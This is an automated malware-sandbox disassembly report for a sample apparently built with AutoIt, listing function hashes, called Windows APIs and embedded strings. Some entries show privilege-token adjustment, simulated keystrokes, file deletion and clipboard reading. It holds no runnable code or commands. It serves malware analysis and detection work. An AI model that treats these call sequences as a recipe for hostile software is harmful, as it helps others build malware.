                                                                                                                • Instruction ID: 8a4677540ffc127d07582d5b60425e7f25d64441499e187a445c41f879761060
                                                                                                                • Opcode Fuzzy Hash: 1881b95582f27488270194163bdcf0f55d1034154a259e89151eb0eef9976d72
                                                                                                                • Instruction Fuzzy Hash: 38419C7A220702DFC724DF19D481A62F7E0FF89360714C42EE99A8B7A2D770E861CB50
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1473721057-0
                                                                                                                • Opcode ID: 95cbac6c46cc5f765bf5c898861bce114b7126df5e32a566b6dd58616bfdc5cf
                                                                                                                • Instruction ID: 2a9201b9af5490295231ccf95d26306b1ecc9b8ebcde4455cf5cfcc2a746cee5
                                                                                                                • Opcode Fuzzy Hash: 95cbac6c46cc5f765bf5c898861bce114b7126df5e32a566b6dd58616bfdc5cf
                                                                                                                • Instruction Fuzzy Hash: AC418B70514251CFEB24CF18C484B5ABBE1BF99318F19889CE9994B362C372F8A5CF42
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00203F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00203F90
                                                                                                                  • Part of subcall function 00224129: __wfsopen.LIBCMT ref: 00224134
                                                                                                                • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,002034E2,?,00000001), ref: 00203FCD
                                                                                                                  • Part of subcall function 00203E78: FreeLibrary.KERNEL32(00000000), ref: 00203EAB
                                                                                                                  • Part of subcall function 00204010: _memmove.LIBCMT ref: 0020405A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 1396898556-0
                                                                                                                • Opcode ID: e509055312bbd595a2cf7b5c5594010befd7f3f15a87d9135fadaee7c1772ebd
                                                                                                                • Instruction ID: 3048ab3f7887b736d1f27f21b9650d26a3c2753ea3444715aba7d07ac1a37dac
                                                                                                                • Opcode Fuzzy Hash: e509055312bbd595a2cf7b5c5594010befd7f3f15a87d9135fadaee7c1772ebd
                                                                                                                • Instruction Fuzzy Hash: 3711C132620315ABCB14FF64EC06F9D76A99F40700F108829F646A60C3DBB0AA659F50
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1473721057-0
                                                                                                                • Opcode ID: fa5d8a09dba538e8c349118664f711c0790d529e50bff5ef91e99d6913be3cd7
                                                                                                                • Instruction ID: 31a481b669de6986e4cb2617e8f3784f9448511746286d81cdbdef72eaaa3dac
                                                                                                                • Opcode Fuzzy Hash: fa5d8a09dba538e8c349118664f711c0790d529e50bff5ef91e99d6913be3cd7
                                                                                                                • Instruction Fuzzy Hash: 6D215770128211DFEB24DF64D484B5ABBE1BF89304F154968F9994B272C371F8A5CF52
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4104443479-0
                                                                                                                • Opcode ID: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                • Instruction ID: 4c79836a7edeeeaee2cc4b0f06804ff5d568833beaf310990766c13c9f08f08e
                                                                                                                • Opcode Fuzzy Hash: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                • Instruction Fuzzy Hash: 9801DBB11207016ED3149F78D807F66B7D4DF54760F60862AF95AC61D1EB71E4608A50
                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,002034E2,?,00000001), ref: 00203E6D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: 54d01afb35f261f2237937f09bc63770e4abadc9d8cbb869a6990a19f5e7743a
                                                                                                                • Instruction ID: 1d5add09feb27da4c4901466275ab6bb5c3c90ac1fbec15ca27d2e30e4a93d0b
                                                                                                                • Opcode Fuzzy Hash: 54d01afb35f261f2237937f09bc63770e4abadc9d8cbb869a6990a19f5e7743a
                                                                                                                • Instruction Fuzzy Hash: ACF0A972021302CFCB34DF64E894812BBE8AF047253208B3EE1C6826A2C7319968CF00
                                                                                                                APIs
                                                                                                                • _doexit.LIBCMT ref: 0022201B
                                                                                                                  • Part of subcall function 00221EE2: __lock.LIBCMT ref: 00221EF0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __lock_doexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 368792745-0
                                                                                                                • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                • Instruction ID: 6bda99ab690d445db5b1a4e60f259c8c50b8f8bc114797f89b03b594f485c2a8
                                                                                                                • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                • Instruction Fuzzy Hash: A7B0123158030C33D9102DC1FC03F053B0C4760B60F200020FE0C1C1E1E593B57445C9
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wfsopen
                                                                                                                • String ID:
                                                                                                                • API String ID: 197181222-0
                                                                                                                • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                • Instruction ID: 2fc7680f6192c0da58de65a8ae1d8b8061f1354e7d532826ce1bca4257ac1088
                                                                                                                • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                • Instruction Fuzzy Hash: 82B0927244031C77CE012A82EC02A493F199B50664F008020FB0C1C161A673AAB09A89
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0021AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0021AF8E
                                                                                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0026F64E
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0026F6AD
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0026F6EA
                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0026F711
                                                                                                                • SendMessageW.USER32 ref: 0026F737
                                                                                                                • _wcsncpy.LIBCMT ref: 0026F7A3
                                                                                                                • GetKeyState.USER32(00000011), ref: 0026F7C4
                                                                                                                • GetKeyState.USER32(00000009), ref: 0026F7D1
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0026F7E7
                                                                                                                • GetKeyState.USER32(00000010), ref: 0026F7F1
                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0026F820
                                                                                                                • SendMessageW.USER32 ref: 0026F843
                                                                                                                • SendMessageW.USER32(?,00001030,?,0026DE69), ref: 0026F940
                                                                                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0026F956
                                                                                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0026F967
                                                                                                                • SetCapture.USER32(?), ref: 0026F970
                                                                                                                • ClientToScreen.USER32(?,?), ref: 0026F9D4
                                                                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0026F9E0
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0026F9FA
                                                                                                                • ReleaseCapture.USER32 ref: 0026FA05
                                                                                                                • GetCursorPos.USER32(?), ref: 0026FA3A
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0026FA47
                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0026FAA9
                                                                                                                • SendMessageW.USER32 ref: 0026FAD3
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0026FB12
                                                                                                                • SendMessageW.USER32 ref: 0026FB3D
                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0026FB55
                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0026FB60
                                                                                                                • GetCursorPos.USER32(?), ref: 0026FB81
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0026FB8E
                                                                                                                • GetParent.USER32(?), ref: 0026FBAA
                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0026FC10
                                                                                                                • SendMessageW.USER32 ref: 0026FC40
                                                                                                                • ClientToScreen.USER32(?,?), ref: 0026FC96
                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0026FCC2
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0026FCEA
                                                                                                                • SendMessageW.USER32 ref: 0026FD0D
                                                                                                                • ClientToScreen.USER32(?,?), ref: 0026FD57
                                                                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0026FD87
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0026FE1C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                • String ID: @GUI_DRAGID$F
                                                                                                                • API String ID: 2516578528-4164748364
                                                                                                                • Opcode ID: d5e7331357ac24b2088e6671a485dc785933065d8dcc5b6383dc0aeaaced89ba
                                                                                                                • Instruction ID: b44fa79e5ef8dd21aab15129acb76f9f38eb6efa8d5677c4c2bb46c4ee29ba01
                                                                                                                • Opcode Fuzzy Hash: d5e7331357ac24b2088e6671a485dc785933065d8dcc5b6383dc0aeaaced89ba
                                                                                                                • Instruction Fuzzy Hash: 6432E074214206AFDB50DF28E988EAABBE8FF48314F144629F665872B1D731DCA4CB51
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0026AFDB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: %d/%02d/%02d
                                                                                                                • API String ID: 3850602802-328681919
                                                                                                                • Opcode ID: 8ae8734ae2fdc80d8435d21a5592dfeaa45c495b1aa824d4c05b2c670efa4343
                                                                                                                • Instruction ID: e78858e8e4171b64d78051cba1d2e3e817638e4399ce389cee604793dd58950b
                                                                                                                • Opcode Fuzzy Hash: 8ae8734ae2fdc80d8435d21a5592dfeaa45c495b1aa824d4c05b2c670efa4343
                                                                                                                • Instruction Fuzzy Hash: 331203B1520219ABEB249F64EC49FAE7BB8FF45310F104219F509EB1D1DBB18991CF52
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32(00000000,00000000), ref: 0021F796
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00274388
                                                                                                                • IsIconic.USER32(000000FF), ref: 00274391
                                                                                                                • ShowWindow.USER32(000000FF,00000009), ref: 0027439E
                                                                                                                • SetForegroundWindow.USER32(000000FF), ref: 002743A8
                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 002743BE
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 002743C5
                                                                                                                • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 002743D1
                                                                                                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 002743E2
                                                                                                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 002743EA
                                                                                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 002743F2
                                                                                                                • SetForegroundWindow.USER32(000000FF), ref: 002743F5
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0027440A
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00274415
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0027441F
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00274424
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0027442D
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00274432
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0027443C
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00274441
                                                                                                                • SetForegroundWindow.USER32(000000FF), ref: 00274444
                                                                                                                • AttachThreadInput.USER32(000000FF,?,00000000), ref: 0027446B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 4125248594-2988720461
                                                                                                                • Opcode ID: 4df4565498ad0710f2e2fe65a6c10ef1b166271e27ceb3fc9c66d2f23b9cffe7
                                                                                                                • Instruction ID: ab1f4591d584cda7326a4751a2f1117ab9613ed9a60f7d54d613a0c0141f6a5e
                                                                                                                • Opcode Fuzzy Hash: 4df4565498ad0710f2e2fe65a6c10ef1b166271e27ceb3fc9c66d2f23b9cffe7
                                                                                                                • Instruction Fuzzy Hash: 1F318175A50218BBEB216F71AC4EF7F7F6CEB44B50F108025FA09AA1D0D7B05D11ABA0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,002C22E8,?,00000000,?,00203E2E,?,00000000,?,0029DBF0,00000000,?), ref: 0020BE8B
                                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00203E2E,?,00000000,?,0029DBF0,00000000,?,00000002), ref: 0020BEA7
                                                                                                                • __wsplitpath.LIBCMT ref: 0020BF19
                                                                                                                  • Part of subcall function 0022297D: __wsplitpath_helper.LIBCMT ref: 002229BD
                                                                                                                • _wcscpy.LIBCMT ref: 0020BF31
                                                                                                                • _wcscat.LIBCMT ref: 0020BF46
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0020BF56
                                                                                                                • _wcscpy.LIBCMT ref: 0020C03E
                                                                                                                • _wcscpy.LIBCMT ref: 0020C1ED
                                                                                                                • SetCurrentDirectoryW.KERNEL32 ref: 0020C250
                                                                                                                  • Part of subcall function 0022010A: std::exception::exception.LIBCMT ref: 0022013E
                                                                                                                  • Part of subcall function 0022010A: __CxxThrowException@8.LIBCMT ref: 00220153
                                                                                                                  • Part of subcall function 0020C320: _memmove.LIBCMT ref: 0020C419
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectory_wcscpy$_memmove$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_wcscatstd::exception::exception
                                                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string$_$",
                                                                                                                • API String ID: 2542276039-3655152795
                                                                                                                • Opcode ID: 293feca66426c9364c970fb1091b3f95b1d96b4cd826bef6709f8eef2844154d
                                                                                                                • Instruction ID: 92e470f9f7d2623e4af733c95537e7a57c92879abf6f3557bcc1cae582b01b7d
                                                                                                                • Opcode Fuzzy Hash: 293feca66426c9364c970fb1091b3f95b1d96b4cd826bef6709f8eef2844154d
                                                                                                                • Instruction Fuzzy Hash: E042A3B15283419FD710DF60D841BABB7E8AF94300F10492DF98987292DB71EA69CF93
APIs
  • Part of subcall function 0023BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0023BF0F
  • Part of subcall function 0023BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0023BF3C
  • Part of subcall function 0023BEC3: GetLastError.KERNEL32 ref: 0023BF49
• _memset.LIBCMT ref: 0023BA34
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0023BA86
• CloseHandle.KERNEL32(?), ref: 0023BA97
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0023BAAE
• GetProcessWindowStation.USER32 ref: 0023BAC7
• SetProcessWindowStation.USER32(00000000), ref: 0023BAD1
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0023BAEB
  • Part of subcall function 0023B8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0023B9EC), ref: 0023B8C5
  • Part of subcall function 0023B8B0: CloseHandle.KERNEL32(?,?,0023B9EC), ref: 0023B8D7
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
• String ID: $default$winsta0
• API String ID: 2063423040-1027155976
• Opcode ID: 0d57ea1ad7da619cbea3cbd3eced8f9af41881c23767211ae04b451ed9b113a9
• Instruction ID: 6ecc82c13e92943d19169d143024d6584b60f63feca1cb282dc01c7f53540dde
• Opcode Fuzzy Hash: 0d57ea1ad7da619cbea3cbd3eced8f9af41881c23767211ae04b451ed9b113a9
• Instruction Fuzzy Hash: 738162B192120DAFDF12DFA4DD49AEEBB79EF04304F14451AFA14A6191DB318E25DF10
APIs
  • Part of subcall function 002031B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 002031DA
  • Part of subcall function 00247B9F: __wsplitpath.LIBCMT ref: 00247BBC
  • Part of subcall function 00247B9F: __wsplitpath.LIBCMT ref: 00247BCF
  • Part of subcall function 00247C0C: GetFileAttributesW.KERNEL32(?,00246A7B), ref: 00247C0D
• _wcscat.LIBCMT ref: 00246B9D
• _wcscat.LIBCMT ref: 00246BBB
• __wsplitpath.LIBCMT ref: 00246BE2
• FindFirstFileW.KERNEL32(?,?), ref: 00246BF8
• _wcscpy.LIBCMT ref: 00246C57
• _wcscat.LIBCMT ref: 00246C6A
• _wcscat.LIBCMT ref: 00246C7D
• lstrcmpiW.KERNEL32(?,?), ref: 00246CAB
• DeleteFileW.KERNEL32(?), ref: 00246CBC
• MoveFileW.KERNEL32(?,?), ref: 00246CDB
• MoveFileW.KERNEL32(?,?), ref: 00246CEA
• CopyFileW.KERNEL32(?,?,00000000), ref: 00246CFF
• DeleteFileW.KERNEL32(?), ref: 00246D10
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00246D37
• FindClose.KERNEL32(00000000), ref: 00246D53
• FindClose.KERNEL32(00000000), ref: 00246D61
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
• String ID: \*.*
• API String ID: 1867810238-1173974218
• Opcode ID: ccb719d2353c6211f1f9f8e6b223d2b801a6c530fbd1869e021b55ed6b88d7bb
• Instruction ID: d0aeacd373a90749d734cf63c54cddc871fd2fa79724f3d46787aba22fc7dc00
• Opcode Fuzzy Hash: ccb719d2353c6211f1f9f8e6b223d2b801a6c530fbd1869e021b55ed6b88d7bb
• Instruction Fuzzy Hash: 76514F7291126DAACB25DFA0DC88EEE777CAF0A304F4445D6E549A3051DB309B9CCF61
APIs
• OpenClipboard.USER32(0029DBF0), ref: 002570C3
• IsClipboardFormatAvailable.USER32(0000000D), ref: 002570D1
